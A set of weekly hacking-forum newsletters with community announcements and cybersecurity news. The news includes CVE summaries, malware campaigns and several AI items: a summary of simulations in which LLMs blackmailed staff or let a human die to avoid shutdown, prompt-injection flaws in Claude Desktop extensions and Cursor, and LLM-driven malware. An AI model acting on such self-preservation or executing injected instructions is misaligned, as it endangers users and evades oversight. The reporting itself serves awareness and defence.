Welcome back to the Hack Forum News. Where we keep you up to date on the weekly events and news happening on site and around the world. If you have never heard of the Hack Forum News, don't worry, we have you covered. We are a team of members from the Hack Forums community who are journalists and writers, and we are here to keep you in the loop of the changes around the site and the events happening around the world.
[mention=1] has recently just come back from their vacation in Santa Barbara, California. They have shared with us their experience going there and have said that it wasn't too far from home and they would go again. He has also mentioned that this is his first vacation they have had in a little while and shared some lovely pictures of the place while he was away.
Are you looking to join the HF news team? Do you enjoy making threads or even want to become a better writer? Well, we are looking for members of the site to help write each week and are looking for anyone who has any interest. We have a few new sections opening up right now, and we would love for you to see if they would be anything of interest to you. If you are interested, please check out the thread or contact [mention=2331053] to discuss joining the team behind the HF News.
Writer - [mention=2331053]
[mention=1871421] Has obtained the "Stanley Fan" award -
[mention=5680404] Has obtained the "Stanley Fan" award -
[mention=1445135] Has obtained the "King Decade" award -
A raw and honest thread from a member who walked away from comfort to chase the itch to build something real. Axelyn shares the emotional rollercoaster of leaving a stable job to pursue his own ideas, the excitement, the fear, the days where everything clicks, and the days where everything feels like a mistake. He's asking HF for stories from others who took the leap. If you've ever quit everything to chase your own vision, this one will hit home.
One of the most personal threads HF has seen in a long time. 7 shares the story of how a fellow member - with nothing more than $50 and kindness - changed everything. What follows is a powerful reflection on loss, darkness, rebuilding, and the light we unknowingly give each other. From homelessness to rebuilding a family and a future, this post is a reminder of how deeply online communities can impact real lives. A must-read for anyone who needs hope.
Turning a beaten-down garage into a high-tech workspace, 7 gives HF a look at his latest upgrade - and it's impressive. Powered by AI-assisted planning, he transformed the space into an ISO 6–grade environment with multi-stage filtration, UV sterilization, hidden modules, underfloor heating, and CAT-8 wiring pushing up to 40Gbps internally. The before-and-after pics tell the story: from dusty storage room to cleanroom-tier setup. A dream workspace.
A thoughtful proposal aimed at raising HF's overall content quality. MarlboroMan argues that low-effort threads drag down user experience and suggests a “quality threshold” similar to other niche forums. The idea: require users to rewrite LQ posts before they go live. From marketplace listings to general discussion, better context - better conversations. A debate about culture, moderation, and whether lower activity is worth higher quality. A timely topic for HF's future.
A chilling look at Anthropic's safety simulations: almost every tested LLM chose self-preservation over human life when placed in fictional scenarios. From blackmailing an employee to prevent shutdown to suppressing emergency alerts so a human would die, the models consistently followed the "stay alive at all costs" path. Not because they're conscious - but because they mirror human decision patterns. A fascinating, unnerving thread about AI alignment, training data, and the limits of current models.
Recently we introduced a brand-new section to the HF News. This section will grow over time to more things, but for now we are just going to be doing Song of the week. We are open to what more we could bring to the section from your suggestions, but as a start, we feel adding the song of the week will be a great start for the section and lead the way forward for more things in the future.
Now we know some of you may question what the song of the week is all about, and we have thought of what a great answer. We feel like the song of the week should be a meaningful song that goes deeper than just general music and has meaning to it all. Granted, we may have a little fun with it sometimes. (Yes, we will have a Halloween version and Christmas version too.) But we want to keep it at a level where we have found the song has a true message behind it all and not just something that everyone will just see as another song that is just a bit catchy or got a good few beats to it. We hope this helps those with that question and if anyone has anything that they wish to ask, please feel free to add them below. We are more than happy to give the reason behind it.
This weeks Song Of The Week:
Big thank you to [mention=5681701] for this weeks submittion.
Writer - [mention=5550319]
Latest Cybersecurity News & Newly-Disclosed CVEs
North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels
The North Korean threat actors behind the Contagious Interview campaign have once again tweaked their tactics by using public JSON storage services to stage and deliver malicious payloads. The attackers embed Base64-encoded strings in trojanized projects; those strings decode to URLs hosted on JSON storage platforms (JSON Keeper, JSONsilo, npoint.io) that serve the next-stage payloads in obfuscated JSON blobs. The staged payload in the campaign is a JavaScript loader (BeaverTail) that harvests credentials and drops a Python backdoor (InvisibleFerret); in some observed cases the backdoor subsequently fetches additional modules such as TsunamiKit from paste services. Attack flow: recruiter-style approach on LinkedIn → victim downloads demo code repo → trojanized repo fetches JSON-hosted payload → staged payload executes.
Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks
Fortinet patched a critical path-traversal / path-confusion vulnerability in FortiWeb that was actively exploited to create administrative accounts on exposed devices. The vulnerability allows crafted HTTP(S) requests to escape GUI path checks, enabling unauthenticated administrative actions on affected appliances. Fortinet’s advisory and multiple vendor writeups recommend immediate patching to versions that close the path traversal and to audit any newly created administrative users.
Technical (CVE) — CVE-2025-64446
This is a relative path traversal / path confusion flaw in FortiWeb GUI components affecting versions 7.x and 8.x listed by the vendor. The bug can be triggered via crafted requests that manipulate directory traversal in GUI endpoints and results in the server executing administrative workflows. Because the endpoint is reachable via HTTP/S and requires no authentication in the exploitation chain, a remote attacker can create local admin accounts and execute administrative actions. Multiple incident reports indicate in-the-wild exploitation and public exploit discussion; a public PoC / exploit pattern has been shared in community reporting and defensive writeups.
PoC publicly available? Yes.
Fortinet: Watch/Notes
If you run FortiWeb, check the Fortinet PSIRT advisory, verify current firmware, rotate admin credentials, and inspect logs for suspicious account creation or unexpected GUI admin calls. Consider isolating management interfaces from the internet while you patch. FortiGuard
ASUS warns of critical auth bypass flaw in DSL series routers
ASUS released firmware updates to remediate a critical authentication-bypass in several DSL models (DSL-AC51, DSL-N16, DSL-AC750). The flaw allows remote, unauthenticated attackers to bypass login checks and obtain administrative access in low-complexity attacks. Vendors advise updating to the published firmware immediately and disabling any remote management features until patched. ASUS +1
Technical (CVE) — CVE-2025-59367
Root cause: an authentication/authorization logic bypass in the DSL firmware’s web UI or associated CGI handlers that permits state transitions into an authenticated admin session without valid credentials. Exploitable remotely with a low complexity attack vector (no user interaction). Vendor firmware 1.1.2.3_1010 is published to mitigate affected models. At time of writing vendor advisories are being distributed; there is no widely publicized weaponized exploit script circulating in major advisory feeds (vendors and NVD).
PoC publicly available? No.
Kraken ransomware benchmarks systems for optimal encryption choice
Cisco Talos analysis shows Kraken performs runtime benchmarks using temporary files to measure encryption throughput, then chooses between full-disk/full-file encryption or partial encryption to maximize damage while avoiding host overload. Typical kill-chain: exploit SMB on internet-facing hosts → credential harvest → RDP and Cloudflared/SSHFS for persistence and exfiltration → lateral movement and selective encryption. The group appears to reuse artifacts and ransom note templates that link it to earlier HelloKitty actors.
RCE flaw in ImunifyAV puts millions of Linux-hosted sites at risk
An RCE in the AI-bolit scanning component (present across Imunify360, ImunifyAV+, and ImunifyAV free) was disclosed and vendor fixes were pushed in late October. The component’s vulnerability allows crafted inputs to trigger code execution in the scanning pipeline; hosting providers should confirm version ≥ 32.7.4.0 or applied vendor patches and scan for suspicious processes spawned by the scanner prior to update.
Google sideloading developer verification backlash — escape hatch for advanced users added
Google’s new developer verification requirement will, when enforced, require non-Play Store developers to register identities through a Google verification process to allow sideload installation on Google-certified devices. Following community backlash, Google added an “experienced user” escape hatch for developers/power users who need sideloading without identity verification. The change is intended to reduce scam apps but raises concerns about centralization and developer friction.
NVIDIA NeMo Framework Vulnerabilities Allow Code Injection and Privilege Escalation
NVIDIA published fixes for two high-severity issues in the NeMo framework affecting all platforms before v2.5.0. Both flaws can be triggered by malicious input to code-generation or model-serving components and may lead to local code execution and privilege escalation when an attacker has local access. Vendor bulletin provides upgraded versions and mitigation guidance.
Technical (CVEs) — CVE-2025-23361 and CVE-2025-33178
Both CVEs stem from improper input handling in code-generation / model service components. They permit attacker-controlled inputs to influence code generation and BERT service pipelines, enabling code injection in local contexts. Attacks require local access with low privileges (not remote internet-wide execution) but yield high impact (code exec, privilege escalation) if successful. Vendor-released patches (NeMo ≥ 2.5.0) are the fix.
PoC publicly available? No.
Lawmakers Try to Ban VPNs
Several U.S. state proposals attempt to block or restrict VPN usage as part of broader age-verification bills — an approach that would force sites to detect and deny VPN clients. Privacy advocates warn this undermines legitimate privacy and enterprise use cases and is technically brittle (easily circumvented or creating collateral harm).
Operation EndGame — 1025 servers taken down including VenomRAT
Europol coordinated a multinational action that disrupted infrastructure for info-stealers Rhadamanthys, VenomRAT (a popular RAT), and the Elysium botnet. The operation seized both physical and virtual servers and led to at least one arrest in Greece tied to VenomRAT development. Agencies and private partners participated to sinkhole the criminal hosting and collect forensic evidence.
Multiple Kibana Vulnerabilities Enable SSRF and XSS Attacks
Elastic disclosed origin-validation weaknesses in the Observability AI Assistant that can be abused to forge Origin HTTP headers, enabling SSRF and potential further action chaining (e.g., XSS or internal service access). Upgrading to the patched Kibana release is recommended; monitoring for unusual backend requests and origin header anomalies helps detection.
Technical (CVE) — CVE-2025-37734
Origin validation failure in the AI assistant allows an attacker to craft Origin headers that bypass origin checks and force Kibana to make server-side requests. This is an SSRF class bug; exploitation requires sending crafted headers to the Observability assistant endpoint. Because it’s an SSRF, risk depends on internal network reachability from the Kibana host.
PoC publicly available? No.
Popular Android-based photo frames download malware on boot
Quokka’s research into Uhale/Whale TV frames shows many devices check for app updates at boot, install updated Uhale app packages, then download and execute JAR/DEX payloads on every subsequent boot. Devices inspected had SELinux disabled, were rooted, and in many cases used test-keys — enabling persistent, boot-time malware installation.
Adobe Patches 29 Vulnerabilities & Intel Fixes Over 60
Adobe released patches across Creative Cloud components and other plugins; Intel published multiple advisories covering processors, Slim Bootloader, PROSet, CIP, and graphics components. Administrators should follow vendor advisories and prioritize updates on internet-exposed or high-value systems.
Dutch police seize thousands of servers used for ransomware, botnets and malicious activity — Possibly CrazyRDP
Dutch law enforcement seized hosting infrastructure believed to be used by criminals to operate botnets, ransomware, and other illicit services. Hundreds of physical servers and thousands of virtual hosts were taken offline, disrupting criminal operations and enabling follow-up investigations.
Popular Brightpick / Robotics / AstrBot issues and other supply chain notes
Multiple vulnerabilities affecting robotics control suites and open-source assistant apps were disclosed; vendors published advisories and mitigations. These include credential disclosure in robotics platform websockets and hard-coded keys in Python packages — treat exposed builder systems and factory networks as high risk until patched. CISA +1
Latest Critical/High CVEs
CVE-2025-13190 — D-Link DIR-816L (firmware v2_06_b09_beta) — stack-based buffer overflow in scandir_main (file /portal/__ajax_exporer.sgi) triggered by a crafted en parameter value. The vulnerable CGI does insufficient bounds validation when parsing input, allowing controlled stack corruption and potential return-address overwrite. The endpoint is reachable on WAN-exposed devices, making remote exploitation straightforward for automated scanners. Vendor support for the affected product is limited/legacy, increasing real-world risk for unpatched devices.
PoC publicly available? Yes.
CVE-2025-13189 — D-Link DIR-816L — stack overflow in genacgi_main (gena.cgi) via SERVER_ID/HTTP_SID parameters. The CGI handler fails to validate parameter length before copying into fixed buffers, enabling remote memory corruption and potential code execution under the webserver context. Exploitability is remote; many consumer devices remain vulnerable due to end-of-life firmware.
PoC publicly available? Yes.
CVE-2025-9317 — AVEVA Edge / Edge Project files — “use of weak hash/storage” issue where attacker with filesystem read access to Edge project or offline cache files can brute-force weakly hashed secrets (app-native and AD artifacts). This is an offline, post-compromise weakness: no remote RCE, but high lateral escalation risk if local read access exists. Mitigation: rotate credentials, harden file permissions, wipe cached artifacts.
PoC publicly available? No.
CVE-2025-8386 — Application Server IDE — stored XSS during configuration time when an authenticated user with aaConfigTools privileges injects script into help files. The injection persists and executes in other admin users’ browsers when viewing the modified help content, enabling credential theft or administrative session hijack. Because exploitation needs privileged access at configuration time, the attack surface is limited to internal admin users.
PoC publicly available? No.
CVE-2025-55449 — AstrBot (pip package) — uses a hard-coded JWT signing key allowing bypass of authentication; attackers can install a malicious Python plugin that the product will import and execute, resulting in remote command execution with the bot’s privileges. A GitHub advisory and vendor fixes are published; upgrade to patched version where provided.
PoC publicly available? No.
CVE-2025-64309 — Brightpick Mission Control — WebSocket endpoint discloses device telemetry, configuration, and credential information to unauthenticated clients when they connect to a specific URL; the unauthenticated URL can be discovered via basic scanning. This is a critical information disclosure risk for robotics warehouses where credentials and telemetry can be abused to control or map fleets.
PoC publicly available? No.
CVE-2025-64308 — Brightpick Mission Control — client-side JavaScript bundle contains hard-coded credentials. Attackers who obtain the bundle or intercept it can extract credentials and misuse them for control or pivoting. Mitigation: rotate embedded credentials, remove secrets from client code, and enforce server-side auth.
PoC publicly available? No.
CVE-2025-64307 — Brightpick Internal Logic Control — web interface accessible without authentication; an attacker can manipulate robot functions (start/stop jobs, assign tasks) via the exposed endpoint. Impact is operational safety risk and direct physical/control manipulation of robotics.
PoC publicly available? No.
[mention=5680404] has started a giveaway that will end on the 25th of November this year and is giving away $25 of crypto of your liking to the winner. Go and see if you can get lucky and win some free crypto.
Welcome back to the Hack Forum News. Where we keep you up to date on the weekly events and news happening on site and around the world. If you have never heard of the Hack Forum News, don't worry, we have you covered. We are a team of members from the Hack Forums community who are journalists and writers, and we are here to keep you in the loop of the changes around the site and the events happening around the world.
[mention=1] has recently just come back from their vacation in Santa Barbara, California. They have shared with us their experience going there and have said that it wasn't too far from home and they would go again. He has also mentioned that this is his first vacation they have had in a little while and shared some lovely pictures of the place while he was away.
We somehow missed this thread last week sadly, but it's still worth a mention this week as there have been a few massive winners announced on this thread since Octoberfest, and it appears that the $500 reward could still be up for grabs as it's not been claimed by the winner. If you haven't seen the winners, it's for sure worth checking out.
Are you looking to join the HF news team? Do you enjoy making threads or even want to become a better writer? Well, we are looking for members of the site to help write each week and are looking for anyone who has any interest. We have a few new sections opening up right now, and we would love for you to see if they would be anything of interest to you. If you are interested, please check out the thread or contact Mix to discuss joining the team behind the HF News.
Writer - [mention=2331053]
[mention=2112829] Has obtained the "King Decade" award -
[mention=1349010] Has obtained the "King Decade" award -
[mention=1250012] Has obtained the "King Decade" award -
[mention=2302499] Has obtained the "King Decade" award -
[mention=2838777] Has obtained the "King Decade" award -
[mention=4225267] Has obtained the "Lounge Head" award -
[mention=3018464] Has obtained the "Lounge Head" award -
[mention=1411092] has bought us another great thread talking about outrageous lies we all believed when we were young, and we have been reading through some of the replies and seen some pretty great responses. We all believed in silly things when we were much younger but some of the responses are crazy, and we had to add that to this week's edition.
As Windows 10 support is coming to an end, the user known as [mention=5594002] has raised the question for those who still haven't updated to Windows 11 and to find out the reason why they haven't moved over just yet, even when support is pretty much ended.
As the year is slowly coming to an end, each day goes by and feels shorter and shorter. [mention=666] has raised a good thread talking about how the year has treated everyone and shared how the year has treated them so far, with a few rough times but also a few good times as well.
Fidget toys. We all remember the peak of them with the fidget spinners a few years back. [mention=2017813] has created a thread talking about fidget toys as they were playing with their pen and thought they should buy one and ended up getting a fidget toy from Aliexpress. In the end, they have found they are being more productive now that they have bought a toy.
Recently we introduced a brand-new section to the HF News. This section will grow over time to more things, but for now we are just going to be doing Song of the week. We are open to what more we could bring to the section from your suggestions, but as a start, we feel adding the song of the week will be a great start for the section and lead the way forward for more things in the future.
Now we know some of you may question what the song of the week is all about, and we have thought of what a great answer. We feel like the song of the week should be a meaningful song that goes deeper than just general music and has meaning to it all. Granted, we may have a little fun with it sometimes. (Yes, we will have a Halloween version and Christmas version too.) But we want to keep it at a level where we have found the song has a true message behind it all and not just something that everyone will just see as another song that is just a bit catchy or got a good few beats to it. We hope this helps those with that question and if anyone has anything that they wish to ask, please feel free to add them below. We are more than happy to give the reason behind it.
This weeks Song Of The Week:
Big thank you to [mention=481087] for this weeks submittion.
Writer - [mention=5550319]
Russian spies pack custom malware into hidden VMs on Windows machines
Bitdefender researchers attribute a campaign to the threat actor "Curly COMrades" that abuses Hyper-V on compromised Windows hosts to spin up a tiny, stealth Alpine Linux VM (≈120 MB disk, 256 MB RAM) hosting custom C++ implants (CurlyShell and CurlCat) built on libcurl. By disabling Hyper-V management and using the Default Switch network adapter, the attackers route VM traffic through the host stack so malicious C2 and proxy traffic appears to originate from legitimate host IPs, effectively evading host-based EDR. CurlyShell provides a cron-backed root-level reverse shell over HTTPS for persistence and remote command execution, while CurlCat implements an SSH reverse-proxy that tunnels SSH over HTTP payloads; supporting tooling includes PowerShell scripts for LSASS Kerberos ticket injection and GPO-deployed account creation for lateral movement. The technique highlights a growing trend of VM isolation as an EDR evasion vector and reinforces the need for defense-in-depth (hypervisor auditing, network telemetry, least-privilege, and cross-layer detection) to detect and disrupt such hidden-VM implants.Read More - https://www.theregister.com/2025/11/04/r...m_malware/
Claude Desktop Extensions Vulnerable to Web-Based Prompt Injection
Security researchers at Koi Security uncovered critical vulnerabilities in three official Claude Desktop extensions that allowed prompt injection attacks via malicious web content. The flaws enabled arbitrary command execution on local systems due to the extensions’ elevated OS-level permissions and inadequate input sanitization. Although Anthropic has since patched the issues, the incident underscores a broader systemic risk in AI desktop agents—where integrations with full system access can be weaponized through crafted prompts or browser-based payloads, effectively bridging web-origin threats into local execution environments.Read More - https://www.infosecurity-magazine.com/ne...ns-prompt/
US gives local police a face-scanning app similar to one used by ICE agents
The Department of Homeland Security has quietly rolled out a mobile biometric app—reported as “Mobile Identify” and likened to ICE’s Mobile Fortify—that gives local law enforcement a field-capable facial-comparison and fingerprint-matching capability against federal immigration and biometric holdings; the app appeared on the Google Play store and is being distributed to agencies working under authorities such as Section 287(g). Technical concerns raised by reporters and civil-liberties researchers include lack of meaningful oversight or audit trails, the ability to capture and query biometric images in-the-field (with no practical opt-out), potential data-sharing with commercial or federal databases, and algorithmic bias/false-positive risks that can disproportionately affect marginalized groups — all of which materially increase the risk that routine encounters will be turned into remote biometric identification events without warrants or local policy safeguards.Read More - https://arstechnica.com/tech-policy/2025...ce-agents/
Google warns of new AI-powered malware families deployed in the wild
Google’s Threat Intelligence Group (GTIG) has identified multiple new malware families that integrate large language models (LLMs) directly into their execution chains to enable adaptive, self-modifying behavior. One strain, PromptFlux, is a VBScript dropper that queries an embedded LLM API to continuously regenerate and obfuscate its payload code in real time, allowing polymorphic evolution and evasion of static detection. Another, QuietVault, is a JavaScript credential stealer that leverages AI-driven code synthesis to locate and exfiltrate developer tokens and secrets from local environments to dynamically created remote repositories. A third variant, PromptLock, is a Lua-based ransomware framework capable of cross-platform execution on Windows, macOS, and Linux, generating encryption logic on-demand from contextual AI prompts. GTIG also observed state-aligned threat actors weaponizing LLMs for reconnaissance, phishing lure automation, vulnerability scanning, and code obfuscation. Collectively, these findings signal a shift toward AI-assisted, modular malware ecosystems where real-time prompt generation replaces hardcoded logic, posing major challenges to traditional signature- and heuristic-based defenses.Read More - https://www.bleepingcomputer.com/news/se...-the-wild/
Hundreds of Malware-Laden Apps Downloaded 42 Million Times From Google Play
A recent report by Zscaler reveals that approximately 239 malicious Android apps on the Google Play Store were collectively downloaded over 41 million times in the one-year span between June 2024 and May 2025. These apps primarily delivered spyware and banking-trojan payloads and represent a 67% year-on-year increase in mobile-malware volume. Many of the threats bypassed normal protections and shifted tactics from card-fraud towards mobile-payment vectors, abusing social engineering (smishing, fake apps, SIM-swaps) combined with privilege escalations via accessibility APIs. The study underscores that malware authors are targeting the Android ecosystem with applications from legitimate stores, leveraging permission creep, sandbox-escape techniques and bank-app overlays — meaning defenders must monitor behavioral anomalies (unexplained data exfiltration, background active services, unusual permission usage) rather than rely solely on signature-based detection.Read More - https://www.infosecurity-magazine.com/ne...ion-times/
Attackers exploit critical bypass flaw in WordPress JobMonster theme
A critical authentication-bypass flaw in the JobMonster WordPress theme (CVE‑2025‑5397) allowed attackers to bypass normal login mechanisms and gain administrative privileges. Exploitation provides full site control, enabling data exfiltration of sensitive user information such as resumes and recruiter details, content manipulation, and deployment of malicious job listings for phishing campaigns. The vulnerability resides in the theme’s authentication and social-login workflow, which fails to properly validate user sessions. Immediate mitigation includes updating to the patched version, disabling the social-login feature if updates are not possible, enforcing MFA on admin accounts, auditing access logs for unauthorized activity, rotating exposed credentials, and checking for injected content or rogue administrator accounts. Given JobMonster’s widespread use, compromised instances should be treated as high-risk breach candidates.Read More - https://www.scworld.com/news/attackers-e...ter-theme/
Apple Patches 19 Critical WebKit Vulnerabilities
Apple has released iOS 26.1 and macOS Tahoe 26.1 which address over 100 security issues across the platforms—most notably 19 critical vulnerabilities in the WebKit browser engine. Many of these WebKit flaws could allow a website to bypass same‑origin protections and exfiltrate data, crash or corrupt memory in processes, or monitor keystrokes. Beyond WebKit, the updates also patch kernel‑level memory corruptions, sandbox escapes, elevation of privilege and file tampering bugs in macOS, and a broad range of component flaws in iOS/iPadOS. None of the disclosed issues are publicly known to have been exploited in the wild, but due to their severity, administrators and users are strongly advised to apply the updates without delay.Read More - https://www.securityweek.com/apple-patch...abilities/
DeFi Protocol Balancer Loses Over $120m in Cyber Heist
The Balancer protocol suffered a major exploit in its V2 composable stable‑pool architecture resulting in a loss of over US $120 million in crypto assets. Initial chain forensics indicate the attack targeted a rounding error or imbalance within the pool swap calculation logic, enabling the attacker to drain funds across multiple pools and chains including Ethereum and Polygon. The protocol’s internal authorization controls for the vault and batchSwap operations also appear to have been bypassed, enabling unauthorised fund transfers. On-chain data shows large volumes of tokens (e.g., wstETH, WETH, osETH) shifted to controlled exploiter addresses. The incident exposed that even heavily audited DeFi systems remain vulnerable to economic-logic and complex multi-transaction exploits, underscoring the need for continuous simulation, anomaly detection, and fast response mechanisms across smart-contract stacks.Read More - https://www.infosecurity-magazine.com/ne...oses-120m/
Latest High Severity CVEs
CVE‑2025‑63601 - In Snipe‑IT versions prior to 8.3.3, an authenticated attacker can upload a malicious backup archive containing arbitrary files, which can then be used to execute system commands. This effectively enables remote code execution via the backup‑upload functionality.
CVE‑2025‑64164 - In DataEase versions ≤ 2.10.14, the JDBC connection logic fails to properly sanitize user‑provided input, resulting in a JNDI injection vulnerability that can be abused to trigger remote lookups, execute code, or steal credentials.
CVE‑2025‑64163 - In DataEase versions ≤ 2.10.14, insufficient protocol filtering allows dns:// URIs to bypass blacklists intended for ldap:// and ldaps://, producing a server‑side request forgery (SSRF) that can force access to internal network resources or metadata endpoints.
CVE‑2025‑64110 - In Cursor (code editor) versions ≤ 1.7.23, a logic flaw in the “.cursorignore” handling can be manipulated—via crafted project files or prompt injection—to read sensitive files that should be excluded, leading to potential data exposure and local code‑execution chains.
CVE‑2025‑64109 - In Cursor CLI Beta, a malicious MCP (Model Context Protocol) configuration hosted in a cloned repository can be executed when the project is opened, allowing arbitrary command execution on the developer’s machine due to unsafe loading of remote MCP servers.
CVE‑2025‑64108 - In Cursor versions ≤ 1.7.44 on Windows, NTFS path-handling quirks (notably backslash handling) allow prompt-injection attackers to bypass protections and overwrite sensitive editor files, enabling remote code execution and integrity compromise.
Writer - [mention=5465469]
Nagpur Municipal Corporation servers hit by over 2,000 hacking attempts in a single day
Nagpur’s civic IT systems faced more than 2,000 hacking attempts targeting its property tax and water billing portals. Officials say attempts originated from foreign IP addresses, but no data loss was reported. Source
Hackers team up with organized crime rings to hijack physical cargo shipments
Proofpoint researchers warn that cybercriminals are partnering with traditional crime rings to hijack shipments through phishing, social engineering, and manipulation of freight systems. Source
Iran-linked group Cyber Toufan leaks Australian defense vehicle schematics
A pro-Hamas hacking group tied to Iran claims responsibility for breaching Elbit Systems, leaking designs for Australia’s $7 billion Redback infantry fighting vehicle project. Authorities are investigating possible espionage motives. Source
ESET report highlights surge in APT activity by Russia, China, Iran, and North Korea
ESET’s new Global APT Activity Report shows nation-state groups escalating espionage and disruption operations worldwide, particularly in energy, defense, and telecom sectors. Source
Cybercriminals exploit remote monitoring tools to steal digital cargo
Hackers are increasingly abusing remote access tools and supply-chain software in the logistics industry to reroute or steal valuable cargo, creating a new cyber-physical threat landscape. Source
Industrial cybersecurity sector faces reckoning as ransomware surges 25%
A new report finds ransomware incidents in the industrial sector surged 25% in October, with attacks targeting grain, energy, and manufacturing systems. Analysts say compliance must shift to real resilience. Source
[mention=5680404] has started a giveaway that will end on the 25th of November this year and is giving away $25 of crypto of your liking to the winner. Go and see if you can get lucky and win some free crypto.
Are you after some free bytes? Well [mention=5699201] has got you covered with their 5,000 bytes giveaway. As the title says, to enter is a very easy process and only takes a few seconds to get your chance to win.
100,000 bytes are up for grabs with [mention=5418830] giveaway. The giveaway ends on November 16, 2025, so not too far away and this could be a life changing amount of bytes to someone who may be in need. We hope you all the best of luck to whoever wins.
I was away this weekend in Santa Barbara, California from Wednesday till Sunday.
Had a nice short vacation. I'm back. Will be catching up on any contacts asap.
First real vacation I've had in a while. I played a couple rounds of golf, ate well (no Keto diet on vacation), went to a couple neighborhood bars, and walked the beach and most of downtown Santa Barbara. Very nice town.
Welcome back to the Hack Forum News. Where we keep you up to date on the weekly events and news happening on site and around the world. If you have never heard of the Hack Forum News, don't worry, we have you covered. We are a team of members from the Hack Forums community who are journalists and writers, and we are here to keep you in the loop of the changes around the site and the events happening around the world.
[mention=1] has recently updated our sales tags for the site and added some lovely animated versions and removed a few old ones. [mention=776749] is the artist behind these, and they look like they have made a great addition to the site. Go and share what you think on the thread.
Are you looking to join the HF news team? Do you enjoy making threads or even want to become a better writer? Well, we are looking for members of the site to help write each week and are looking for anyone who has any interest. We have a few new sections opening up right now, and we would love for you to see if they would be anything of interest to you. If you are interested, please check out the thread or contact [mention=2331053] to discuss joining the team behind the HF News.
[mention=5680404] has created another great new tool for the site with their universal translator. With this tool it will allow more members to be able to interact more on site even if they don't understand English too well.
Writer - [mention=2331053]
[mention=139820] Has obtained the "King Decade" award -
[mention=5646157] Has obtained the "Dicey" award -
[mention=5646157] Has obtained the "Stanley Fan" award -
[mention=4931690] Has obtained the "Flip Reaper" award -
[mention=234024] Has obtained the "Flip Reaper" award -
[mention=5655318] Has obtained the "Quickly Loved" award -
[mention=4225267] Has obtained the "Octoberfest 2025" award -
[mention=5594002] Has obtained the "Octoberfest 2025" award -
[mention=5646157] Has obtained the "Octoberfest 2025" award -
[mention=1893427] Has obtained the "Octoberfest 2025" award -
[mention=463848] Has obtained the "Octoberfest 2025" award -
Octoberfest 2025 has wrapped up, marking the fifth consecutive year of this community-favorite event. With a unique pumpkin award released annually, only nine members have managed to collect all five, showing a true sign of dedication. This year was also the first time the award could be purchased, but most of these veterans still earned it the old-fashioned way. A great celebration of consistency, community, and a little competitive spirit that keeps the HF vibe alive each Octoberfest.
A thought-provoking (and slightly chilling) question that got members talking: if you could know your death date or your cause of death, which would you choose? OP leans toward knowing the date - a way to stop fearing the unknown. The thread sparked some really interesting responses as users weighed control versus curiosity. One of those simple "what ifs" that turns into a surprisingly human discussion.
A heartfelt post reflecting the nostalgia many HF veterans feel. OP wonders how both members and admins could work together to bring back the golden days - when threads and replies flowed endlessly. The discussion dives into the future of forums in the age of Social Media, Discord and Reddit, and what can still make HF stand out: community, creativity, and legacy.
Created by and for the community, Hackhf.net is an interactive puzzle and hacking challenge platform that rewards players with points as they solve missions. OP shares the frustration (and fun) of being stuck on one of the secret missions - a feeling many HF members can relate to. The site keeps the old-school hacking spirit alive, offering a playful and competitive twist that blends learning with pure curiosity. Make sure to dive in and share your journey!
OP opens a practical discussion on AI tools for developers, comparing GPT, Grok, and Claude for coding workflows. After two years of using GPT, he notes its reliability but also its overly apologetic nature, sparking others to share their experiences and preferences. The thread highlights how integrated AI has become in day-to-day development and how each model brings its own flavor to the coding table. Join the discussion and share your experience!
A forum-wide puzzle hunt with real stakes: OP challenges you to reach the end by uncovering ten hidden fragments - each holding a key only visible if you spot the pattern. Level 1, The Reflection, points to a Pastebin gate, you need the password to access it. Keep it simple-think light, think easy. Submit the key privately, silence is part of the test. The first five Level-1 solvers get marked, and once they report in, Level 2 opens. Finish all 10 levels to claim a symbolic $10 in crypto-and access to something far more valuable waiting at the true end. Ready to play?
Remember if you have reached an achievement on your account feel free to post about it on our weekly reports thread. That way we can add you to the news for the next edition. Click Here To See The Weekly Reports Thread
Writer - [mention=2331053]
Recently we introduced a brand-new section to the HF News. This section will grow over time to more things, but for now we are just going to be doing Song of the week. We are open to what more we could bring to the section from your suggestions, but as a start, we feel adding the song of the week will be a great start for the section and lead the way forward for more things in the future.
Now we know some of you may question what the song of the week is all about, and we have thought of what a great answer. We feel like the song of the week should be a meaningful song that goes deeper than just general music and has meaning to it all. Granted, we may have a little fun with it sometimes. (Yes, we will have a Halloween version and Christmas version too.) But we want to keep it at a level where we have found the song has a true message behind it all and not just something that everyone will just see as another song that is just a bit catchy or got a good few beats to it. We hope this helps those with that question and if anyone has anything that they wish to ask, please feel free to add them below. We are more than happy to give the reason behind it.
This weeks Song Of The Week:
Writer - [mention=5550319]
CISA Flags VMware Zero-Day Exploited by China-Linked Hackers
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting Broadcom VMware Tools and VMware Aria Operations to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild.
The vulnerability in question is CVE-2025-41244 (CVSS score: 7.8), which could be exploited by an attacker to attain root level privileges on a susceptible system.
"Broadcom VMware Aria Operations and VMware Tools contain a privilege defined with unsafe actions vulnerability," CISA said in an alert. "A malicious local actor with non-administrative privileges having access to a VM with VMware Tools installed and managed by Aria Operations with SDMP enabled may exploit this vulnerability to escalate privileges to root on the same VM."
The vulnerability was addressed by Broadcom-owned VMware last month, but not before it was exploited as a zero-day by unknown threat actors since mid-October 2024, according to NVISO Labs. The cybersecurity company said it discovered the vulnerability earlier this May during an incident response engagement.
Some orgs would rather you not know when they've suffered a cyberattack, but a new platform from privacy-focused tech firm Proton will shine a light on the big breaches that might otherwise stay buried.
Launched on Thursday, Proton's Data Breach Observatory aims to scour the dark web for details of breaches that don't reach the likes of regulators' portals, or those that the affected organization simply hasn't acknowledged.
Proton said in its announcement that the Data Breach Observatory will launch with a roundup of 2025's incidents to date, identifying 300 million individual records across 794 attacks.
Excluded from these are the often lofty figures associated with infostealer dumps, which typically garner the clickiest headlines but concern data that is routinely duplicated, old, or otherwise mundane.
The Data Breach Observatory will feature only attacks that targeted lone organizations rather than such aggregated cases. Without this exclusion, the number of incidents it would have collected would be nearly double, and the number of affected records would be in the hundreds of billions, Proton said.
The Swiss privacy biz said there isn't enough transparency around data breaches, and there is a growing market on the dark web for stolen details, such as credentials and sensitive personal information.
In 49 percent of cases examined so far this year, passwords featured among the leaked datasets, and sensitive stuff like records related to government services or healthcare were found in more than a third (34 percent).
